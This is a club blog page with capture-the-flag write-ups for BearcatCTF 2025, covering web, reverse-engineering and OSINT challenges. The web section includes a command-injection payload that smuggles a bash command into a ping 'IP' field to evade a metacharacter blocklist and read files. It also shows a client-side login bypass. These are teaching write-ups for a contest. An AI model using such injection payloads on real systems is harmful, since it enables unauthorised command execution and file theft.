<!DOCTYPE html><html lang="en" data-astro-cid-sckkx6r4> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="icon" type="image/svg+xml" href="/favicon.svg"><meta name="generator" content="Astro v5.0.3"><title>GopherHack</title><link rel="stylesheet" href="/_astro/poster.B_Cpo-Oc.css">
<link rel="stylesheet" href="/_astro/_name_.B51i_3Fs.css">
<link rel="stylesheet" href="/_astro/_post_.Dsfu0bp3.css">
<link rel="stylesheet" href="/_astro/image.CVYE6UPY.css"></head> <body data-astro-cid-sckkx6r4> <section class="mainSection" data-astro-cid-sckkx6r4> <div class="content" data-astro-cid-sckkx6r4> <header data-astro-cid-sckkx6r4> <div data-astro-cid-sckkx6r4> <!-- left --> <a href="/" id="logo" data-astro-cid-sckkx6r4>
&#x1F6A9; GopherHack</a> </div> <div data-astro-cid-sckkx6r4> <!-- right --> <div class="links" data-astro-cid-sckkx6r4> <a href="/pages/contests" data-astro-cid-sckkx6r4>Contests</a> <a href="/pages/blog" data-astro-cid-sckkx6r4>Blog</a> <a href="/pages/resources" data-astro-cid-sckkx6r4>Resources</a> <a href="/pages/officers" data-astro-cid-sckkx6r4>Officers</a> </div> <div class="buttons" data-astro-cid-sckkx6r4></div> </div> </header> <main data-astro-cid-sckkx6r4>  <h1 data-astro-cid-quoef3qp> <span class="draft" data-astro-cid-quoef3qp>[draft]</span> BearcatCTF 2025 Writeups </h1> <div class="metadata" data-astro-cid-quoef3qp> <div title="2025-02-02T19:49:20.529Z" data-astro-cid-quoef3qp> Sunday, February 2, 2025 </div> <div data-astro-cid-quoef3qp>
Authored by <a href="/authors/michael">michael</a> </div>  <div data-astro-cid-quoef3qp>Tags: web, rev, osint</div> </div> <div class="postContent" data-astro-cid-quoef3qp> <h1 id="web">Web</h1>
<h2 id="global-redirect-100">global-redirect: 100</h2>
<blockquote>
<p>A new “world-class” website is claiming to have top-tier security worthy of an international stage. Unfortunately for them, their defenses are far from impressive. Show how easy it is to navigate their weaknesses and gain admin access.</p>
<p><a href="http://chal.bearcatctf.io:39724">http://chal.bearcatctf.io:39724</a></p>
</blockquote>
<p>This challenge presents us with a login page.
First course of action is to look at the source.
We see this Javascript:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="js"><code><span class="line"><span style="color:#F97583">function</span><span style="color:#B392F0"> loginAuthenticate</span><span style="color:#E1E4E8">(){</span></span>
<span class="line"><span style="color:#F97583">    var</span><span style="color:#E1E4E8"> password </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> document.</span><span style="color:#B392F0">getElementById</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">&quot;password&quot;</span><span style="color:#E1E4E8">);</span></span>
<span class="line"><span style="color:#F97583">    var</span><span style="color:#E1E4E8"> hash </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> sjcl.hash.sha256.</span><span style="color:#B392F0">hash</span><span style="color:#E1E4E8">(password);</span></span>
<span class="line"><span style="color:#F97583">    var</span><span style="color:#E1E4E8"> hexRepresentation </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> sjcl.codec.hex.</span><span style="color:#B392F0">fromBits</span><span style="color:#E1E4E8">(hash);</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#E1E4E8"> (hexRepresentation </span><span style="color:#F97583">==</span><span style="color:#9ECBFF"> &quot;2a70282a868c0ca9e6fe5bb5cf2ac2ea6b523062102bada26fb87091d511e3f1&quot;</span><span style="color:#E1E4E8">){</span></span>
<span class="line"><span style="color:#B392F0">        alert</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">&quot;welcome Home Admin&quot;</span><span style="color:#E1E4E8">);</span></span>
<span class="line"><span style="color:#E1E4E8">        window.location </span><span style="color:#F97583">=</span><span style="color:#9ECBFF"> &quot;./0078f62f00305b73de6ccace8f9fc1f68a8f1dcec865d33fcacbaf255ddefaa7&quot;</span><span style="color:#E1E4E8">;</span></span>
<span class="line"><span style="color:#E1E4E8">    }</span><span style="color:#F97583">else</span><span style="color:#E1E4E8">{</span></span>
<span class="line"><span style="color:#B392F0">        alert</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">&quot;Incorrect Password. Please Try Again&quot;</span><span style="color:#E1E4E8">);</span></span>
<span class="line"><span style="color:#E1E4E8">    }</span></span>
<span class="line"><span style="color:#B392F0">    alert</span><span style="color:#E1E4E8">(hash);</span></span>
<span class="line"><span style="color:#E1E4E8">}</span></span>
<span class="line"></span></code></pre>
<p>Great, we can just bypass the authentication and go directly to the redirect!
Navigating to <a href="http://chal.bearcatctf.io:39724/0078f62f00305b73de6ccace8f9fc1f68a8f1dcec865d33fcacbaf255ddefaa7">http://chal.bearcatctf.io:39724/0078f62f00305b73de6ccace8f9fc1f68a8f1dcec865d33fcacbaf255ddefaa7</a>
gives us the flag: <code>BCCTF{T1ck3t_t0_0wn3rsh1p!}</code>.</p>
<h2 id="unhealthy-2-the-sequel-500">unhealthy 2 the sequel: 500</h2>
<blockquote>
<p>It seems that some people couldn’t wait for me to finish before they started hacking. Well now I have a brand new extra-secure firewall in place! Have fun with that!</p>
<p><a href="http://chal.bearcatctf.io:30812">http://chal.bearcatctf.io:30812</a></p>
</blockquote>
<p>We are greeted with a landing page that says “Under development”.</p>
<p>This time, the <code>robots.txt</code> hints to us that we need to check: <a href="http://chal.bearcatctf.io:30812/health-check">http://chal.bearcatctf.io:30812/health-check</a>.
This page seems to ask us for an IP and returns an output that suspiciously looks like the CLI output from <code>ping</code>:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="plaintext"><code><span class="line"><span>Health response: PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 64 bytes from 127.0.0.1: icmp_seq=1 ttl=255 time=0.017 ms --- 127.0.0.1 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms</span></span>
<span class="line"><span></span></span></code></pre>
<p>This prompted me to try shell injection.
After some trial and error, I discovered that <code>127.0.0.1; ba&quot;&quot;sh -c &#39;ls&#39;</code> worked.
Here’s the app.py code:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="py"><code><span class="line"><span style="color:#E1E4E8">splits </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> [</span><span style="color:#9ECBFF">&#39;||&#39;</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">&#39;&amp;&amp;&#39;</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">&#39;;&#39;</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">&#39;&amp;&#39;</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">&#39;|&#39;</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">&#39;&lt;&#39;</span><span style="color:#E1E4E8">,</span><span style="color:#9ECBFF">&#39;&gt;&#39;</span><span style="color:#E1E4E8">]</span></span>
<span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> validate</span><span style="color:#E1E4E8">(cmd : </span><span style="color:#79B8FF">str</span><span style="color:#E1E4E8">):</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#9ECBFF"> &#39;$(&#39;</span><span style="color:#F97583"> in</span><span style="color:#E1E4E8"> cmd: </span><span style="color:#F97583">return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#9ECBFF"> &#39;</span><span style="color:#79B8FF">\\</span><span style="color:#9ECBFF">&#39;</span><span style="color:#F97583"> in</span><span style="color:#E1E4E8"> cmd: </span><span style="color:#F97583">return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#E1E4E8"> cmd.count(</span><span style="color:#9ECBFF">&#39;`&#39;</span><span style="color:#E1E4E8">) </span><span style="color:#F97583">&gt;</span><span style="color:#79B8FF"> 1</span><span style="color:#E1E4E8">: </span><span style="color:#F97583">return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#9ECBFF"> &#39;IFS&#39;</span><span style="color:#F97583"> in</span><span style="color:#E1E4E8"> cmd: </span><span style="color:#F97583">return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    if</span><span style="color:#9ECBFF"> &#39;flag.txt&#39;</span><span style="color:#F97583"> in</span><span style="color:#E1E4E8"> cmd: </span><span style="color:#F97583">return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#E1E4E8">    parts </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> [cmd]</span></span>
<span class="line"><span style="color:#F97583">    for</span><span style="color:#E1E4E8"> s </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> splits:</span></span>
<span class="line"><span style="color:#E1E4E8">        nparts </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> []</span></span>
<span class="line"><span style="color:#F97583">        for</span><span style="color:#E1E4E8"> l </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> [p.split(s) </span><span style="color:#F97583">for</span><span style="color:#E1E4E8"> p </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> parts]:</span></span>
<span class="line"><span style="color:#E1E4E8">            nparts </span><span style="color:#F97583">+=</span><span style="color:#E1E4E8"> l</span></span>
<span class="line"><span style="color:#E1E4E8">        parts </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> nparts</span></span>
<span class="line"><span style="color:#E1E4E8">    parts </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> [p.strip() </span><span style="color:#F97583">for</span><span style="color:#E1E4E8"> p </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> parts]</span></span>
<span class="line"><span style="color:#F97583">    for</span><span style="color:#E1E4E8"> p </span><span style="color:#F97583">in</span><span style="color:#E1E4E8"> parts:</span></span>
<span class="line"><span style="color:#E1E4E8">        c </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> p.split()[</span><span style="color:#79B8FF">0</span><span style="color:#E1E4E8">]</span></span>
<span class="line"><span style="color:#F97583">        if</span><span style="color:#E1E4E8"> run([</span><span style="color:#9ECBFF">&#39;which&#39;</span><span style="color:#E1E4E8">,c],</span><span style="color:#FFAB70">capture_output</span><span style="color:#F97583">=</span><span style="color:#79B8FF">True</span><span style="color:#E1E4E8">).stdout:</span></span>
<span class="line"><span style="color:#F97583">            return</span><span style="color:#79B8FF"> False</span></span>
<span class="line"><span style="color:#F97583">    return</span><span style="color:#79B8FF"> True</span></span>
<span class="line"></span></code></pre>
<p>It seems like as long as all of our bash commands are valid under <code>which</code>, we’re free to go ahead and run it.
I also noticed <code>flag.txt</code> is explicitly disallowed.
I found <code>flag.txt</code> lying in <code>/</code>.</p>
<p>Now, I enter the payload: <code>127.0.0.1; ba&quot;&quot;sh -c &#39;cat /*.txt | base64&#39;</code>, which returns the flag: <code>BCCTF{M4yb3_!_sH0uld_jus7_f011ow_b3s7_pr4ac7ic3s}</code></p>
<h1 id="rev">Rev</h1>
<h2 id="say-cheese-150">Say Cheese: 150</h2>

<blockquote>
<p>ChatGPT made this challenge, I think it has a lot of holes… much like a certain type of food.</p>
<a href="/_astro/cheese.Cms4EIG-.py">cheese.py</a>
</blockquote>
<p>Pretty straightforward to reverse; I even asked ChatGPT to reverse it: <a href="https://chatgpt.com/share/679fcf7e-87bc-8007-8f97-d9d5e5761a59">https://chatgpt.com/share/679fcf7e-87bc-8007-8f97-d9d5e5761a59</a>.</p>
<h2 id="easy-encrypt-300">Easy Encrypt: 300</h2>

<blockquote>
<p>RE is fun but these binary things are so weird!</p>
<a href="/_astro/easy.B9r-SUPs">easy</a>
</blockquote>
<p>First, let’s run the binary:</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="plaintext"><code><span class="line"><span>❯ ./easy                                             </span></span>
<span class="line"><span>I dropped my flag somewhere! Can you find it for me? </span></span>
<span class="line"><span>asdf</span></span>
<span class="line"><span>Hmmm... No that isn&#39;t right at all.</span></span>
<span class="line"><span></span></span></code></pre>
<p>I honestly did not try to look into how this binary worked, because I wanted to get some experience with angr.</p>
<p>I hadn’t used it before, and there were some troubles with getting it to work, but it finally worked just with <code>simgr.run()</code> and checking the <code>posix.dumps</code> to see if the win message was there.
Then I just crunched the solver on all the constraints gathered along the way.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="plaintext"><code><span class="line"><span>0x1477                                                                                             </span></span>
<span class="line"><span>0x147b, 0x148c                                                                                     </span></span>
<span class="line"><span>0x10b0, 0x10b0                                                                                     </span></span>
<span class="line"><span>0x180a60, 0x180a60                                                                                 </span></span>
<span class="line"><span>0x148a, 0x149b                                                                                     </span></span>
<span class="line"><span>0x149b, 0x14b7                                                                                     </span></span>
<span class="line"><span>0x14b7, 0x400050                                                                                   </span></span>
<span class="line"><span>0x400050, 0x400050                                                                                 </span></span>
<span class="line"><span>0x400050                                                                                           </span></span>
<span class="line"><span>                                                                                                   </span></span>
<span class="line"><span>&lt;SimulationManager with 3 deadended&gt;                                                               </span></span>
<span class="line"><span>b&quot;I dropped my flag somewhere! Can you find it for me?\nHmmm... No that isn&#39;t right at all.\n&quot;     </span></span>
<span class="line"><span>b&quot;I dropped my flag somewhere! Can you find it for me?\nHmmm... No that isn&#39;t right at all.\n&quot;     </span></span>
<span class="line"><span>b&#39;BCCTF{7H47_w4snt_s0_H4rD}\x01\n&#39;                                                                 </span></span>
<span class="line"><span>b&#39;I dropped my flag somewhere! Can you find it for me?\nThere it is!\n&#39;                            </span></span>
<span class="line"><span></span></span></code></pre>

<p>My solve script can be found <a href="/_astro/solve_easy.BPxn4izW.py">here</a>.</p>
<h2 id="shimbles-the-e-l-f-450">Shimbles the E-L-F: 450</h2>

<blockquote>
<p>Shimbles the ELF has encrpyted your data, and wants you to suffer. Show Shimbles humans are not to be trifiled with.</p>
<p>Hint: Look into the decryption cycle super close, the key is hidden behind two layers of bit rotatation and obfuscation.</p>
<a href="/_astro/Shimbles-the-elf.C6NFcHTz">Shimbles-the-elf</a>
</blockquote>
<p>Again, disregarded the hint and used angr, with surprisingly few modifications from Easy Encrypt.</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8;overflow-x:auto" tabindex="0" data-language="plaintext"><code><span class="line"><span>❯ python solve_shimbles.py                         </span></span>
<span class="line"><span>&lt;SimulationManager with 1 active, 1 found&gt;         </span></span>
<span class="line"><span>&lt;SimState @ 0x14f2&gt;                                </span></span>
<span class="line"><span>b&#39;elfmagic\n&#39;                                      </span></span>
<span class="line"><span></span></span></code></pre>

<p>My solve script can be found <a href="/_astro/solve_shimbles.DTYDmorN.py">here</a>.</p>
<h2 id="turing-approved-600">Turing Approved: 600</h2>

<blockquote>
<p>I wrote a flag verification program for this challenge so when you find the flag, you can confirm it’s correct! Aren’t I just the kindest?</p>
<p>NOT ALL ONLINE COMPILERS WORK</p>
<a href="/_astro/verificationProgram.Ct-Y4iCY">verificationProgram</a>
</blockquote>
<p>This verification program is a Brainfuck program.
I converted the brainfuck to Python using <a href="https://github.com/philippwindischhofer/Brainfuck2Python">this tool</a>.
Then, I printed out the state of the tape right after all of the inputs had been taken.
I observed that the flag was lying directly in memory, although on an offset.</p>
<p>Taking each 3rd byte, you get <code>BCCTF{blame_the_swiss}</code>.</p>
<h1 id="osint">Osint</h1>
<h2 id="been-touring-the-arctic-150">Been Touring the Arctic: 150</h2>

<blockquote>
<p>A friend of mine said that if I put this file into Google Earth, it’ll bring me to his favorite animal from the rainforests of Southeast Asia. I’ll take his word for it. The flag is the animal’s scientific name, with an underscore instead of a space.</p>
<p>For example: <code>BCCTF{scientific_name}</code></p>
<a href="/_astro/animal.D235BHCU.kml">animal.kml</a>
</blockquote> </div>  </main> <footer data-astro-cid-sckkx6r4>
&mdash;
<a href="https://github.com/gopherhackumn/website" target="_blank" rel="noopener" data-astro-cid-sckkx6r4>Website source</a>
&mdash;
</footer> </div> </section> </body></html> 